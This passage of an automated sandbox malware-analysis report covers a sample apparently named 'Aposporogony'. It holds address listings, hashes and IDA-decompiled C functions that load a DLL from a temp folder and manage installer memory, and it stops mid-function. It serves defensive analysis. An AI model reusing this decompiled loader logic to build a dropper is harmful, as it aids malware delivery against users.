                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e66
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6f
                                                                                                                                                                                      0x00406e72
                                                                                                                                                                                      0x00406e75
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e7a
                                                                                                                                                                                      0x00406e7d
                                                                                                                                                                                      0x00406e80
                                                                                                                                                                                      0x00406e83
                                                                                                                                                                                      0x00406e86
                                                                                                                                                                                      0x00406e89
                                                                                                                                                                                      0x00406e8a
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8f
                                                                                                                                                                                      0x00406e92
                                                                                                                                                                                      0x00406e95
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e9b
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x0040715e

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                      • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                                                                                      • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                      			E00402032(void* __ebx, void* __eflags) {
                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                      				struct HINSTANCE__* _t31;
                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                      				WCHAR* _t37;
                                                                                                                                                                                      				intOrPtr* _t38;
                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t32 = __ebx;
                                                                                                                                                                                      				asm("sbb eax, 0x42a318");
                                                                                                                                                                                      				 *(_t39 - 4) = 1;
                                                                                                                                                                                      				if(__eflags < 0) {
                                                                                                                                                                                      					_push(0xffffffe7);
                                                                                                                                                                                      					L15:
                                                                                                                                                                                      					E00401423();
                                                                                                                                                                                      					L16:
                                                                                                                                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t37 = E00402C41(0xfffffff0);
                                                                                                                                                                                      				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C41(1);
                                                                                                                                                                                      				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                                                                                                                                                                      					L3:
                                                                                                                                                                                      					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                                                                                                                                                      					 *(_t39 + 8) = _t23;
                                                                                                                                                                                      					if(_t23 == _t32) {
                                                                                                                                                                                      						_push(0xfffffff6);
                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					_t38 = E00406831( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
                                                                                                                                                                                      					if(_t38 == _t32) {
                                                                                                                                                                                      						E00405450(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *(_t39 - 4) = _t32;
                                                                                                                                                                                      						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                                                                                                                                                                      							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40ce38, 0x40a000); // executed
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                                                                                                                                                                      							if( *_t38() != 0) {
                                                                                                                                                                                      								 *(_t39 - 4) = 1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403A78( *(_t39 + 8)) != 0) {
                                                                                                                                                                                      						FreeLibrary( *(_t39 + 8));
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t31 = GetModuleHandleW(_t37); // executed
                                                                                                                                                                                      				 *(_t39 + 8) = _t31;
                                                                                                                                                                                      				if(_t31 != __ebx) {
                                                                                                                                                                                      					goto L4;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                      			}










                                                                                                                                                                                      0x00402032
                                                                                                                                                                                      0x00402032
                                                                                                                                                                                      0x00402037
                                                                                                                                                                                      0x0040203e
                                                                                                                                                                                      0x004020fd
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x00402ac5
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4
                                                                                                                                                                                      0x00402ad4
                                                                                                                                                                                      0x0040204d
                                                                                                                                                                                      0x00402057
                                                                                                                                                                                      0x0040205a
                                                                                                                                                                                      0x0040206a
                                                                                                                                                                                      0x0040206e
                                                                                                                                                                                      0x00402076
                                                                                                                                                                                      0x00402079
                                                                                                                                                                                      0x004020f6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004020f6
                                                                                                                                                                                      0x0040207b
                                                                                                                                                                                      0x00402086
                                                                                                                                                                                      0x0040208a
                                                                                                                                                                                      0x004020ca
                                                                                                                                                                                      0x0040208c
                                                                                                                                                                                      0x0040208f
                                                                                                                                                                                      0x00402092
                                                                                                                                                                                      0x004020be
                                                                                                                                                                                      0x00402094
                                                                                                                                                                                      0x00402097
                                                                                                                                                                                      0x004020a0
                                                                                                                                                                                      0x004020a2
                                                                                                                                                                                      0x004020a2
                                                                                                                                                                                      0x004020a0
                                                                                                                                                                                      0x00402092
                                                                                                                                                                                      0x004020d2
                                                                                                                                                                                      0x004020eb
                                                                                                                                                                                      0x004020eb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004020d2
                                                                                                                                                                                      0x0040205d
                                                                                                                                                                                      0x00402065
                                                                                                                                                                                      0x00402068
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00402F08), ref: 004054AB
                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll), ref: 004054BD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 334405425-0
                                                                                                                                                                                      • Opcode ID: 013951e13e867832e816f1aada557e66ae952b3d870b5e20e5c1b1f928cf1495
                                                                                                                                                                                      • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 013951e13e867832e816f1aada557e66ae952b3d870b5e20e5c1b1f928cf1495
                                                                                                                                                                                      • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                                                      			E00401B77(void* __ebx) {
                                                                                                                                                                                      				intOrPtr _t8;
                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                      				void _t12;
                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                      				char* _t36;
                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t28 = __ebx;
                                                                                                                                                                                      				_t8 =  *((intOrPtr*)(_t37 - 0x20));
                                                                                                                                                                                      				_t30 =  *0x40ce38; // 0x0
                                                                                                                                                                                      				if(_t8 == __ebx) {
                                                                                                                                                                                      					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
                                                                                                                                                                                      						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                                                                                                                                                      						_t34 = _t9;
                                                                                                                                                                                      						_t5 = _t34 + 4; // 0x4
                                                                                                                                                                                      						E0040640A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
                                                                                                                                                                                      						_t12 =  *0x40ce38; // 0x0
                                                                                                                                                                                      						 *_t34 = _t12;
                                                                                                                                                                                      						 *0x40ce38 = _t34;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						if(_t30 == __ebx) {
                                                                                                                                                                                      							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t3 = _t30 + 4; // 0x4
                                                                                                                                                                                      							E004063E8(_t33, _t3);
                                                                                                                                                                                      							_push(_t30);
                                                                                                                                                                                      							 *0x40ce38 =  *_t30; // executed
                                                                                                                                                                                      							GlobalFree(); // executed
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L15;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						_t8 = _t8 - 1;
                                                                                                                                                                                      						if(_t30 == _t28) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t30 =  *_t30;
                                                                                                                                                                                      						if(_t8 != _t28) {
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							if(_t30 == _t28) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t32 = _t30 + 4;
                                                                                                                                                                                      								_t36 = L"Call";
                                                                                                                                                                                      								E004063E8(_t36, _t30 + 4);
                                                                                                                                                                                      								_t22 =  *0x40ce38; // 0x0
                                                                                                                                                                                      								E004063E8(_t32, _t22 + 4);
                                                                                                                                                                                      								_t25 =  *0x40ce38; // 0x0
                                                                                                                                                                                      								_push(_t36);
                                                                                                                                                                                      								_push(_t25 + 4);
                                                                                                                                                                                      								E004063E8();
                                                                                                                                                                                      								L15:
                                                                                                                                                                                      								 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t37 - 4));
                                                                                                                                                                                      								_t14 = 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(0x200010);
                                                                                                                                                                                      					_push(E0040640A(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                                                                                                                                      					E00405A4E();
                                                                                                                                                                                      					_t14 = 0x7fffffff;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L17:
                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                      			}














                                                                                                                                                                                      0x00401b77
                                                                                                                                                                                      0x00401b77
                                                                                                                                                                                      0x00401b7a
                                                                                                                                                                                      0x00401b82
                                                                                                                                                                                      0x00401bcb
                                                                                                                                                                                      0x00401bf9
                                                                                                                                                                                      0x00401c02
                                                                                                                                                                                      0x00401c04
                                                                                                                                                                                      0x00401c08
                                                                                                                                                                                      0x00401c0d
                                                                                                                                                                                      0x00401c12
                                                                                                                                                                                      0x00401c14
                                                                                                                                                                                      0x00401bcd
                                                                                                                                                                                      0x00401bcf
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00401bd5
                                                                                                                                                                                      0x00401bd5
                                                                                                                                                                                      0x00401bda
                                                                                                                                                                                      0x00401be1
                                                                                                                                                                                      0x00401be2
                                                                                                                                                                                      0x00401be7
                                                                                                                                                                                      0x00401be7
                                                                                                                                                                                      0x00401bcf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401b84
                                                                                                                                                                                      0x00401b84
                                                                                                                                                                                      0x00401b84
                                                                                                                                                                                      0x00401b87
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401b8d
                                                                                                                                                                                      0x00401b91
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401b93
                                                                                                                                                                                      0x00401b95
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401b9b
                                                                                                                                                                                      0x00401b9b
                                                                                                                                                                                      0x00401b9e
                                                                                                                                                                                      0x00401ba5
                                                                                                                                                                                      0x00401baa
                                                                                                                                                                                      0x00401bb4
                                                                                                                                                                                      0x00401bb9
                                                                                                                                                                                      0x00401bbe
                                                                                                                                                                                      0x00401bc2
                                                                                                                                                                                      0x004029e1
                                                                                                                                                                                      0x00402ac5
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ace
                                                                                                                                                                                      0x00402ace
                                                                                                                                                                                      0x00401b95
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401b91
                                                                                                                                                                                      0x004022e4
                                                                                                                                                                                      0x004022f1
                                                                                                                                                                                      0x004022f2
                                                                                                                                                                                      0x004022f7
                                                                                                                                                                                      0x004022f7
                                                                                                                                                                                      0x00402ad0
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalFree.KERNELBASE(00000000), ref: 00401BE7
                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$AllocFree
                                                                                                                                                                                      • String ID: Call
                                                                                                                                                                                      • API String ID: 3394109436-1824292864
                                                                                                                                                                                      • Opcode ID: bee650339d880743e25ffb027d544c91acb57a60daf612cd84576f34cd8f9e92
                                                                                                                                                                                      • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                                                                                                      • Opcode Fuzzy Hash: bee650339d880743e25ffb027d544c91acb57a60daf612cd84576f34cd8f9e92
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00402259() {
                                                                                                                                                                                      				WCHAR* _t34;
                                                                                                                                                                                      				WCHAR* _t37;
                                                                                                                                                                                      				WCHAR* _t39;
                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t39 = E00402C41(_t34);
                                                                                                                                                                                      				_t37 = E00402C41(0x11);
                                                                                                                                                                                      				 *((intOrPtr*)(_t41 + 8)) = E00402C41(0x23);
                                                                                                                                                                                      				if(E0040672B(_t39) != 0) {
                                                                                                                                                                                      					 *(_t41 - 0x68) =  *(_t41 - 8);
                                                                                                                                                                                      					 *((intOrPtr*)(_t41 - 0x64)) = 2;
                                                                                                                                                                                      					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
